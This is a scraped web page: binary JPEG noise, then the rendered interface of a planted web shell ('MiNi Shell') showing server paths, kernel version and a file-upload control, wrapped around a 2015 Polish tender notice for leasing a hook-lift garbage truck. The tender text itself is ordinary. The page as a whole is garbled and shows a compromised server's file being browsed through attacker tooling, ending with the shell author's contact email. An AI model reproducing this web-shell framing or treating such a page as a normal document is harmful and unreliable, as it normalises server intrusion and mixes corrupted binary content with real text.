JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150724/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150724/189150-N-2015.html

<p class="kh_header"><b>Nowy Sącz: Dostawa i sfinansowanie w formie leasingu operacyjnego zakupu jednego fabrycznie nowego samochodu ciężarowego z zabudową specjalistyczną</b><br>
<b>Numer ogłoszenia: 189150 - 2015; data zamieszczenia: 24.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> NOVA Sp. z o.o. , ul. Śniadeckich 14, 33-300 Nowy Sącz, woj. małopolskie, tel. 018 4421200, faks 018 4421200 w. 6.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.nova.nowysacz.pl, www.nova-ns.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka Prawa Handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i sfinansowanie w formie leasingu operacyjnego zakupu jednego fabrycznie nowego samochodu ciężarowego z zabudową specjalistyczną.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa i sfinansowanie w formie leasingu operacyjnego zakupu jednego fabrycznie nowego samochodu ciężarowego z zabudową specjalistyczną.
Wymagane warunki leasingu:
- waluta PLN
- okres płatności 36 miesięcy
- wstępna opłata leasingowa 0 %
- pierwsza rata leasingowa 10 % wartości netto przedmiotu zamówienia+podatek VAT 
- pozostałe 35 rat miesięcznych równe oparte na stałej stopie procentowej 
- wartość wykupu 1 % wartości netto przedmiotu leasingu

DANE TECHNICZNE SAMOCHODU TYPU HAK:
Podwozie i wyposażenie:
1. rok produkcji 2015 spełniający wymogi administracyjne po 01.11.2015 r.
2. podwozie o dopuszczalnej masie całkowitej 18 ton 
3. podwyższona klasa wytrzymałości podwozia
4. ogumienie 315/80R22,5 o rzeźbie bieżnika marki GoodYear RHS i RHD
5. charakterystyka silnika:
- silnik o zapłonie samoczynny
- moc maksymalna 250 KM przy 1900 obr./ min
- o pojemności powyżej 9 litrów moment obrotowym maks 1250 Nm zakres od 1000-1300 obr./min 
- norma emisji spalin EURO 6 z AdBlue
6. skrzynia biegów manualna 8+1
7. koło zapasowe - 315/80R22,5 o rzeźbie bieżnika marki GoodYear RHS
8. układ napędowy pojazdu 4x2 (druga oś napędowa) 
9. rozstaw osi pojazdu 3900 mm +/- 20 mm
10. zawieszenie pojazdu resorowe przód oraz pneumatyczne tył
11. blokada mechanizmu różnicowego osi napędowej
12. pojazd wyposażony w hamulce tarczowe
13. nośność osi przedniej min. 8000 kg
14. nośność osi tylnej napędowej min. 11500 kg
15. wydech pojazdu górny umieszczony za kabiną pojazdu
16. zbiorniki paliwa o pojemności min. 200 litrów
17. ostrzeganie przed przeciążeniem sprzęgła
18. pojazd wyposażony w przystawkę odbioru mocy od skrzyni biegów
19. silnik wyposażony w system kontroli tlenków azotu (NOx)
20. metalowy zderzak przedni
21. zaczep holowniczy fi 40
22. okno w ścianie tylnej kabiny z metalową siatką ochronną

Kabina:
1. kolor kabiny wg palety Auto Color HY 22, kolor żółty SAFFRON XSC1517
2. 3 osobowa siedzenia w układzie 1+2 (3 miejsca siedzące wyposażone w pasy bezpieczeństwa (kierowca + 2 pasażerów) 
3. ławka pasażerów podwójna montowana fabrycznie, poszycie vinyl
4. fotel kierowcy zawieszenie pneumatyczne, poszycie tkanina+vinyl oraz dodatkowy ściągany pokrowiec
5. ściany kabiny pokryte materiałem łatwo-zmywalnym
6. dywaniki gumowe na podłodze
7. elektrycznie sterowane szyb bocznych
8. elektrycznie regulowane i podgrzewane lusterka wsteczne, dodatkowe lustro (tzw. rampowe), lusterka zgodne z dyrektywą EC 2003/97
9. immobilizer fabryczny
10. tachograf cyfrowy
11. gniazdo elektryczne 12V w kabinie 
12. wyświetlacz z komputerem pokładowym w języku polskim  
13. dwa kliny, podnośnik hydrauliczny, narzędzia do obsługi pojazdu
14. nawiew ciepłego i zimnego powietrza
15. ogranicznik prędkości 
16. gaśnica
17. apteczka pierwszej pomocy
18. trójkąt ostrzegawczy
19. belka ze światłami ostrzegawczymi na kabinie
20. reflektory halogenowe H7 z LED światłami do jazdy dziennej
21. dwa reflektory robocze z tyłu na dachu kabiny oraz dwa na belce tylnej zapewniające odpowiednią widoczność podczas pracy
22. światła przeciwmgielne przednie
23. homologacja na pojazd skompletowany z zabudowa hakową
URZĄDZENIE HAKOWE spełniające warunki:
1. udźwig nominalny urządzenia hakowego minimum 10.000 kg
2. hakowiec fabrycznie nowy wyprodukowany nie wcześniej niż 2015 r.
3. urządzenie do obsługi kontenerów 3.500 - 4.500 mm
4. wysokość haka ( wg DIN ) 1.200 mm
5. skok haka co najmniej 600 mm
6. zakres pola pracy w funkcji wywrotu 51°
7. masa urządzenia hakowego max. 1080 kg
8. ciśnienie instalacji hydraulicznej 30 MPa
9. zapotrzebowanie na olej 40 l/min
10. pompa hydrauliczna wraz z zaworem małego obiegu oleju
11. dwa siłowniki hydrauliczne ramy pośredniej urządzenia hakowego
12. siłownik ramienia hakowego
13. hydrauliczny zawór główny z elektronicznym układem sterowania urządzeniem hakowym
14. automatyczna funkcja odpinania, wysuwu, wywrotu - cały cykl załadunku lub rozładunku odbywa się automatycznie za pomocą jednego ruchu dźwignią na pilocie
15. automatyczna funkcja tzw. miękkiego osiadania eliminująca uderzenie kontenera o ramę w końcowej fazie ruchu osiadania
16. pilot urządzenia hakowego wyposażony w licznik roboczogodzin pracy hakowca, zintegrowany z hakowcem
17. sterowanie hakowcem elektryczne z kabiny kierowcy za pomocą panelu sterowniczego zamocowanego na trwałe w kabinie przy fotelu kierowcy lub koło kierownicy
18. dodatkowe sterowanie z zewnątrz bezpośrednio na rozdzielaczu głównym
19. wielofunkcyjny panel sterowniczy z świetlną informacją wykonywanych funkcji i z wyświetlaczem diagnostycznym 
20. elektroniczny system czujników podświetlanych diodowo zabezpieczających przed wykonaniem nieprawidłowego ruchu urządzenia hakowego
21. hydrauliczna blokada kontenera (wewnętrzna lub zewnętrzna) z elektrycznym czujnikiem położenia i świetlnym wskazaniem pozycji (zamknięta/otwarta) na panelu sterowniczym
22. wymagany czas dla wykonania poszczególnych cykli pracy przy wydatku pompy 40 l/min:
a. rozładunek maksymalnie 41 sekund
b. załadunek maksymalnie 31 sekund
c. wywrot maksymalnie 40 sekund
d. opuszczanie kontenera z pozycji wywrot maksymalnie 28 sekund	
23. przesuw kontenera bez konieczności stosowania dodatkowych rolek, max.2 rolki główne prowadzące na końcu ramy 
24. rama główna hakowca pokryta podkładem cynkowym 
25. urządzenie hakowe malowane fabrycznie na gotowo w kolorze czarnym
26. montaż urządzenia wykonany bez spawania płyt montażowych, jedynie za pomocą śrubowych elementów złącznych
27. gwarancja na urządzenie hakowe 24 miesiące
28. minimum 3 przeglądy serwisowe hakowca w okresie gwarancji; przeglądy w siedzibie Zamawiającego 
29. dokumentacja DTR, instrukcja obsługi w języku polskim 
30. katalog części zamiennych w języku polskim lub angielskim
31. urządzenie zarejestrowane w UDT
32. w ramach wynagrodzenia umownego, dostawca we własnym zakresie musi dokonać załadunku, transportu, rozładunku przedmiotu dostawy w miejscu wskazanym przez Zamawiającego.
Warunki gwarancji:
1. dla podwozia i kabiny (na całość) - minimum 24 miesiące
2. dla układu napędowego - minimum 24 miesiące
3. dla urządzenia hakowego - minimum 24 miesiące
Pozostałe wymagania zamawiającego związane z przedmiotem zamówienia:
1. Samochód musi spełniać wszystkie warunki określone w pkt. III niniejszej specyfikacji.
2. Samochód będzie dostarczony przez autoryzowanego przedstawiciela producenta w Polsce. 
3. Czas reakcji serwisu nie będzie dłuższy niż 24 godziny.
4. Leasingowany pojazd bez limitu kilometrów.
5. Świadectwo homologacji na kompletny pojazd.
6. Autoryzowany serwis dla podwozia, w odległości nie większej, niż 120 km od siedziby Zamawiającego.
7. Dostawca zapewni nieodpłatną kalibrację tachografu cyfrowego.
8. Autoryzowany serwis dla zabudowy w siedzibie zamawiającego, a jeżeli czas naprawy przekracza 48 godzin od przyjazdu serwisu Wykonawca dostarcza pojazd zastępczy.
DOKUMENTY:
Wraz ze skompletowanym pojazdem Wykonawca dostarczy wszelkie niezbędne dokumenty, w szczególności:
1. Instrukcje obsługi w języku polskim.
2. Deklaracje zgodności (CE) w języku polskim.
3. Homologację na skompletowany pojazd.
4. Decyzję Urzędu Dozoru Technicznego dopuszczającą pojazd do eksploatacji.
5. Dokument (certyfikat) potwierdzający spełnienie wymogów emisji spalin na poziomie Euro 6 (EKMT w języku polskim).
Ubezpieczenie OC, AC i NW pojazdu na koszt Zamawiającego przez ubezpieczyciela wybranego przez Zamawiającego w  okresie trwania umowy. 
Zamawiający informuje, że wskazane w SIWZ i jej załącznikach typy i symbole materiałów lub urządzeń, nazwy ich producentów i dystrybutorów, nazwy własne produktów, pochodzenie urządzeń itd. Mają charakter przykładowy. Zostały one bowiem określone jedynie w celu sprecyzowania parametrów i wymogów techniczno-użytkowych przedmiotu zamówienia. Zamawiający dopuszcza składanie ofert materiałowo i technologicznie równoważnych tj. takich, w których Wykonawcy mogą zaproponować realizację przedmiotu zamówienia za pomocą materiałów i technologii o parametrach nie gorszych od podanych przez Zamawiającego. Zgodnie z art. 30 ust. 5 ustawy Pzp Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego materiały czy urządzenia spełniają wymagania określone przez Zamawiającego. W związku z powyższym, w przypadku zaoferowania materiałów równoważnych do materiałów i urządzeń określonych w dokumentacji, Wykonawca zobowiązany jest załączyć do oferty szczegółowy opis oferowanych materiałów i urządzeń wskazując, że zaproponowane rozwiązania są równoważne pod względem technicznym, jakościowym i funkcjonalnym. Nie wykazanie materiałów i urządzeń równoważnych traktowane będzie, jako deklaracja zastosowania materiałów i urządzeń wymienionych w dokumentacji przetargowej.
Wymagania stawiane Wykonawcy:
Wykonawca zobowiązany będzie do przeszkolenia pracowników Zamawiającego w zakresie obsługi dostarczonego pojazdu w dniu dokonania dostawy.
Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia.  
Wymagana jest należyta staranność przy realizacji zobowiązań umowy. 
Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 34.14.45.10-6, 66.11.40.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 126.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona  wadium w wysokości 10.000,00 (słownie: dziesięć tysięcy złotych). 
Wadium musi być wniesione przed upływem terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp - załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp - załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp - załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp - załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp - załącznik nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Formularz ofertowy - wypełniony i podpisany przez wykonawcę z wykorzystaniem wzoru -  załącznik nr 1 do SIWZ</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych.
2. Oświadczenie - kara za nieterminową dostawę - zał. nr 5 do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - okres gwarancji urządzenia hakowego - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany umowy. Zmiana jest możliwa w następujących przypadkach: 
- zmiany ustawowej stawki podatku VAT. W takim przypadku obniżenie lub podwyższenie wynagrodzenia jest możliwe w wysokości odpowiadającej zmianie podatku, 
- gdy zmiana ta jest korzystna dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.nova.nowysacz.pl, www.nova-ns.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Istnieje możliwość przesłania SIWZ drogą elektroniczną po uprzednim złożeniu wniosku drogą elektroniczną..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.07.2015 godzina 09:00, miejsce: NOVA Sp. z o.o.
ul. Śniadeckich 14
33-300 Nowy Sącz
Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com